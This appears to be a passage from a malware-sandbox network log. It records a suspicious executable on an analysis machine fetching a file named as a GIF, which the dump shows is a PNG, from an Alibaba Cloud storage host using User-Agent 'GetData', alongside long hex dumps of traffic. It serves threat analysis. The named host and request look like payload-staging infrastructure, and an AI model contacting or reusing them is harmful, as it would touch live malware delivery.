                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                                                                      Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                                                                      Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                                                                      Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                                                                      Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                                                                      Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                                                                      Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                                                                      Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                                                                      Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                                                                      2025-01-09 00:52:55 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                                                                      Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.44973859.110.190.444437572C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:52:56 UTC111OUTGET /b.gif HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:52:57 UTC547INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:52:57 GMT
                                                                                      Content-Type: image/gif
                                                                                      Content-Length: 125333
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1DE972AE9E36365283EB
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 10333201072197591521
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000104
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                                                      x-oss-server-time: 25
                                                                                      2025-01-09 00:52:57 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                      Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                                                      Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                                                      Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                                                      Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                                                      Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                                                      Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                                                                      Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                                                      Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                                                      Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                                      2025-01-09 00:52:57 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
